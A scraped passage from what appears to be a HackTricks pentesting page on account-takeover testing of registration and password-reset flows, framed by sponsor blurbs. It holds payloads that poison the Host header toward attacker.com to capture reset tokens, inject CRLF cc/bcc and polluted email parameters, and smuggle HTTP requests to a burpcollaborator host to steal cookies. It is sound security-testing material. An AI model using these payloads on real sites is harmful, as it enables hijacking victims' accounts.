Search K
Appearance
Appearance
Other ways to support HackTricks:
WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for free at:
test@test.com a
Check if you can figure out when a username has already been registered inside the application.
Creating a user check the password policy (check if you can use weak passwords).
In that case you may try to bruteforce credentials.
Check this pageto learn how to attempt account takeovers or extract information via SQL Injections in registry forms.
When registered try to change the email and check if this change is correctly validated or can change it to arbitrary emails.
Host: attacker.com
, X-Forwarded-Host: attacker.com
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
https://attacker.com/reset-password.php?token=TOKEN
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
The password reset token should be randomly generated and unique every time.
Try to determine if the token expire or if itโs always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
resetToken
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
"admin "
The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245
*.domain.com
1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Craft a request which will overwrite the POST / HTTP/1.1
with the following data:GET http://something.burpcollaborator.net HTTP/1.1 X:
with the goal of open redirect the victims to burpcollab and steal their cookies
3. Final request could look like the following
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone reports exploiting this bug
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
JSON Web Token might be used to authenticate an user.
WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for free at:
Other ways to support HackTricks: